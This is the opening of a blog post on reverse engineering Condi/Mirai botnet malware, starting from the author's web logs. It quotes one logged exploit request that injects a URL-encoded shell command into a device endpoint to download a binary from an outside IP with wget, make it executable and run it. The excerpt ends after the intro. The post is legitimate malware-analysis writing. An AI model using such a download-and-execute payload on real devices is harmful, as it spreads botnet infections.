Reverse Engineering Botnet Malware: Condi/Mirai
Intro I run a website1 and periodically I’ll go check my web logs for any fun or interesting entries. Most of the time it’s someone wasting EC2 credits running FFuF against the entire internet, but every once in a while there’ll be someone trying to exploit a known vulnerability to download some of their malware. These requests typically look like: 1 2 POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20sora.arm7%3B%20wget%20http%3A%2F%2F176.65.139.64%2Fbins%2Fsora.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fsora.arm7%20tbk HTTP/1.1 301 1031 "-" "Mozila/5.0" The core command is pretty standard. ...